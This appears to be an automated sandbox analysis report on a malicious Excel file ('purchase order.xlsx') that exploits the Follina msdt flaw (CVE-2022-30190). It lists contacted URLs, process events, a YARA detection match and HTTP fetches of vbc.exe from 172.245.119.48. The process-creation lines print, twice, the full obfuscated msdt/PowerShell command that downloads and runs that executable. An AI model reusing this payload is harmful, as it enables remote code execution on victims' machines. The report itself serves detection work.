        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://incidents.diagnostics.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://invites.office.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://lifecycle.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://login.microsoftonline.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://login.windows.local
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://management.azure.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://management.azure.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://messaging.action.office.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://messaging.office.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ncus.contentsync.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ncus.pagecontentsync.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://officeapps.live.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://onedrive.live.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://onedrive.live.com/embed?
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://osi.office.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://otelrules.azureedge.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office365.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office365.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pages.store.office.com/review/query
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://powerlift.acompli.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://roaming.edog.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://settings.outlook.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://staging.cortana.ai
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://tasks.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://webshell.suite.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://wus2.contentsync.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://wus2.pagecontentsync.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://www.odwebp.svc.ms
        Source: global trafficHTTP traffic detected: GET /shipping_invc/document.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.119.48Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /870/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.119.48Connection: Keep-Alive

        System Summary

        barindex
        Source: Screenshot number: 4Screenshot OCR: enable Editing and Content from the Yellow bar 18" ~ A above to view locked content. 19" pm 20 2
        Source: DiagPackage.dll.13.drStatic PE information: No import functions for PE file found
        Source: DiagPackage.dll.mui.13.drStatic PE information: No import functions for PE file found
        Source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-20
        Source: 0000000D.00000002.511764004.0000000000828000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-20
        Source: Process Memory Space: msdt.exe PID: 6596, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-20
        Source: DiagPackage.dll.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagPackage.dll.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagPackage.dll.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: purchase order.xlsxReversingLabs: Detection: 17%
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP"
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP"
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP"
        Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{25D11404-BE86-4B00-8632-AD71AC6E433D} - OProcSessId.datJump to behavior
        Source: classification engineClassification label: mal68.expl.winXLSX@10/24@0/1
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.dllJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\DiagPackage.dll.muiJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dllJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\DiagPackage.dll.muiJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dllJump to dropped file
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
